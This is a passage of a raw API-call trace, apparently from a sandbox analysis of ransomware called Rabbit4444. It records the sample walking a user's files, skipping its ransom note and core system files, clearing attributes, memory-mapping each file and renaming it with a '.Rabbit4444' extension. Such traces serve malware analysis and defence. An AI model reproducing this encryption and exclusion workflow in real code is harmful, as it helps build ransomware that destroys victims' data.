param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\c0802597-6174-487a-b7de-20e8b1aa384e_show.xml.Rabbit4444") returned 166 [0070.538] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\c0802597-6174-487a-b7de-20e8b1aa384e_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\c0802597-6174-487a-b7de-20e8b1aa384e_show.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\c0802597-6174-487a-b7de-20e8b1aa384e_show.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\c0802597-6174-487a-b7de-20e8b1aa384e_show.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.539] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7075c97, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xc7075c97, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb8c553ea, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x4187, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", cAlternateFileName="C08025~2.XML")) returned 1 [0070.539] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.539] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.539] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2="Rabbit4444.exe") returned -1 [0070.539] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2=".") returned 1 [0070.539] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2="..") returned 1 [0070.539] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2="windows") returned -1 [0070.539] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2="bootmgr") returned 1 [0070.539] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2="pagefile.sys") returned -1 [0070.539] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2="boot") returned 1 [0070.539] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2="ids.txt") returned -1 [0070.539] lstrcmpiW (lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", lpString2="NTUSER.DAT") returned -1 [0070.539] lstrcpyW (in: lpString1=0x130ec14, lpString2="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml" | out: lpString1="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml") returned="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml" [0070.539] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml", dwFileAttributes=0x0) returned 1 [0070.540] lstrlenW (lpString="c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml") returned 49 [0070.540] lstrlenW (lpString="Rabbit4444") returned 10 [0070.540] lstrcmpiW (lpString1="thdraw.xml", lpString2="Rabbit4444") returned 1 [0070.540] lstrlenW (lpString=".dll") returned 4 [0070.540] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.540] lstrlenW (lpString=".lnk") returned 4 [0070.540] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.540] lstrlenW (lpString=".ini") returned 4 [0070.540] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.540] lstrlenW (lpString=".sys") returned 4 [0070.540] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.540] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.540] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.540] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16185122916) returned 1 [0070.541] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16775) returned 1 [0070.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0070.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0070.541] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4490, lpName=0x0) returned 0x2d0 [0070.542] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4490) returned 0x70000 [0070.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0070.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0070.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0070.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0070.544] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16185427837) returned 1 [0070.544] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0070.544] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0070.544] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.544] CloseHandle (hObject=0x2d0) returned 1 [0070.544] CloseHandle (hObject=0x29c) returned 1 [0070.544] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml.Rabbit4444") returned 170 [0070.544] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\c0802597-6174-487a-b7de-20e8b1aa384e_withdraw.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.545] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc75ac911, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xc75ac911, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xbb0b32d3, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x418b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", cAlternateFileName="E80C85~1.XML")) returned 1 [0070.545] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.545] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.545] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2="Rabbit4444.exe") returned -1 [0070.545] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2=".") returned 1 [0070.545] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2="..") returned 1 [0070.545] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2="windows") returned -1 [0070.545] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2="bootmgr") returned 1 [0070.545] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2="pagefile.sys") returned -1 [0070.545] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2="boot") returned 1 [0070.545] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2="ids.txt") returned -1 [0070.545] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", lpString2="NTUSER.DAT") returned -1 [0070.545] lstrcpyW (in: lpString1=0x130ec14, lpString2="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml" | out: lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml") returned="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml" [0070.545] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml", dwFileAttributes=0x0) returned 1 [0070.548] lstrlenW (lpString="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml") returned 45 [0070.548] lstrlenW (lpString="Rabbit4444") returned 10 [0070.548] lstrcmpiW (lpString1="d_show.xml", lpString2="Rabbit4444") returned -1 [0070.548] lstrlenW (lpString=".dll") returned 4 [0070.548] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.548] lstrlenW (lpString=".lnk") returned 4 [0070.548] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.548] lstrlenW (lpString=".ini") returned 4 [0070.548] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.548] lstrlenW (lpString=".sys") returned 4 [0070.548] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.548] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.548] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.548] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16185915231) returned 1 [0070.548] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16779) returned 1 [0070.549] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0070.549] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0070.549] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4490, lpName=0x0) returned 0x2d0 [0070.550] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4490) returned 0x70000 [0070.551] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.551] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0070.551] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.551] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0070.551] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.551] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0070.551] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.551] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0070.551] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16186197854) returned 1 [0070.551] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0070.551] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0070.551] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.552] CloseHandle (hObject=0x2d0) returned 1 [0070.552] CloseHandle (hObject=0x29c) returned 1 [0070.552] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml.Rabbit4444") returned 166 [0070.552] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_show.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.552] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc761ef9f, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xc761ef9f, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xbaf35d10, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x4172, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", cAlternateFileName="E80C85~2.XML")) returned 1 [0070.552] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.552] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.552] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2="Rabbit4444.exe") returned -1 [0070.552] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2=".") returned 1 [0070.553] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2="..") returned 1 [0070.553] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2="windows") returned -1 [0070.553] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2="bootmgr") returned 1 [0070.553] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2="pagefile.sys") returned -1 [0070.553] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2="boot") returned 1 [0070.553] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2="ids.txt") returned -1 [0070.553] lstrcmpiW (lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", lpString2="NTUSER.DAT") returned -1 [0070.553] lstrcpyW (in: lpString1=0x130ec14, lpString2="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml" | out: lpString1="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml") returned="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml" [0070.553] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml", dwFileAttributes=0x0) returned 1 [0070.553] lstrlenW (lpString="e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml") returned 49 [0070.553] lstrlenW (lpString="Rabbit4444") returned 10 [0070.553] lstrcmpiW (lpString1="thdraw.xml", lpString2="Rabbit4444") returned 1 [0070.553] lstrlenW (lpString=".dll") returned 4 [0070.553] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.553] lstrlenW (lpString=".lnk") returned 4 [0070.553] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.553] lstrlenW (lpString=".ini") returned 4 [0070.553] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.553] lstrlenW (lpString=".sys") returned 4 [0070.553] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.553] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.554] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.554] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16186441629) returned 1 [0070.554] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16754) returned 1 [0070.554] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0070.554] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0070.554] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4480, lpName=0x0) returned 0x2d0 [0070.559] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4480) returned 0x70000 [0070.560] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115288 [0070.560] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0070.560] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115288 | out: hHeap=0xe0000) returned 1 [0070.560] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0070.560] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11d948 [0070.561] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0070.561] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.561] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0070.561] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16187140832) returned 1 [0070.561] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0070.561] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0070.561] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.561] CloseHandle (hObject=0x2d0) returned 1 [0070.561] CloseHandle (hObject=0x29c) returned 1 [0070.561] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml.Rabbit4444") returned 170 [0070.561] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\e80c855c-d75c-47b1-9ae4-f07f8c6c613d_withdraw.xml.rabbit4444"), dwFlags=0x1) returned 1 [0070.562] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa851fb40, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xa851fb40, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x8507a310, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x5c3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", cAlternateFileName="E9D217~1.XML")) returned 1 [0070.562] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.562] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.562] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2="Rabbit4444.exe") returned -1 [0070.562] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2=".") returned 1 [0070.562] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2="..") returned 1 [0070.562] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2="windows") returned -1 [0070.562] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2="bootmgr") returned 1 [0070.562] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2="pagefile.sys") returned -1 [0070.562] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2="boot") returned 1 [0070.562] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2="ids.txt") returned -1 [0070.562] lstrcmpiW (lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpString2="NTUSER.DAT") returned -1 [0070.562] lstrcpyW (in: lpString1=0x130ec14, lpString2="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml" | out: lpString1="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml") returned="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml" [0070.562] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", dwFileAttributes=0x0) returned 1 [0070.563] lstrlenW (lpString="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml") returned 45 [0070.563] lstrlenW (lpString="Rabbit4444") returned 10 [0070.563] lstrcmpiW (lpString1="1_show.xml", lpString2="Rabbit4444") returned -1 [0070.563] lstrlenW (lpString=".dll") returned 4 [0070.563] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0070.563] lstrlenW (lpString=".lnk") returned 4 [0070.563] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0070.563] lstrlenW (lpString=".ini") returned 4 [0070.563] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0070.563] lstrlenW (lpString=".sys") returned 4 [0070.563] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0070.563] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 